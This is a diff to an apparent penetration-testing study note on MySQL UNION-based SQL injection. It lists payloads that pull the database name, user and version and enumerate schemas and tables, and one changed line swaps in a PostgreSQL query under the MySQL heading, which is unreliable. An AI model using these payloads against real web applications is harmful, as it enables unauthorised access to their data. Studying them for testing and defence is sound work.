Mojo8898/OffSec-Notes/Playbook/5 Web/1 Injection/SQL Injection/1 MySQL.md

 ' UNION SELECT null, database(), user(), @@version, null -- // '
 # Now we can query all databases available for us to enumerate (note: information_schema is default)
-' UNION SELECT null, schema_name, null, null, null FROM information_schema.schemata -- //
+' UNION SELECT null, datname, null, null, null FROM pg_database -- //
 '
 # We can now query tables for our desired databases
 ' UNION SELECT null, table_name, null, null, null FROM information_schema.tables WHERE table_schema=database() -- //